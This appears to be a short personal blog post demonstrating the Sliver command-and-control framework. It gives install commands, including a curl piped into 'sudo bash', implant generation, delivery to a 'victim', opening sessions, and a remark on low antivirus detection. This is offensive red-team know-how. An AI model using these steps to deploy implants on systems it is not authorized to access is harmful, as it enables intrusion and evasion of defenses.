Hey Guys,

So I saw a tweet involving @_xpn_ regards how Cobalt Strike is the defacto now days for detection methods and that other maybe not so popular C2 Frameworks could be used to get around detection with a lot less effort.

I've experience with Covenant, MetaSploit and also Cobalt Strike but had never really looked at Sliver, so I thought why not take a look now.

First off navigate to where you what to install Sliver to

so we git clone https://github.com/BishopFox/sliver.git

cd into Sliver

Install with - curl https://sliver.sh/install|sudo bash

Run it with sliver

Easy enough to get up and running, typing help gives you the basic commands you can run.

Right I dont know the ins and outs of this yet as I have just been playing around and havent spent too much time with it but we wil obviously need to create a beacon or implant as thay are known.

use the generate --mtls <your ip> --arch <for OS type 32 /64bit> --save <location to save to>

This will create an implant and tell you where its been saved to for use in your attack, Note worthy that this method created a 12 meg implant, there are most likely ways to reduce the size but for this demo I didnt look into that.

Copy over to victim

Just an http server on attacking system

Another noteworthy item here is that Google Chrome didnt pick this up as malicious.

Then we run the implant

We can see it running in task manager here

Now I closed my window by mistake here so had to fire up Sliver again but that didnt cause any issues with the implants.

At this point you can type sessions to see what active sessions you have running followed by sessions -i <id of session> again from here you can type help for a whole bunch of commands some of which will be familiar to you such as GetSystem, Shell etc etc.

Then going back to what I read in the Tweets I threw the implant into VirusTotal to see the vendor detection rate, for an implant where I have attempted no obfuscation at all only 19 of 66 picked it up.

Thanks for reading

Cyberzombi3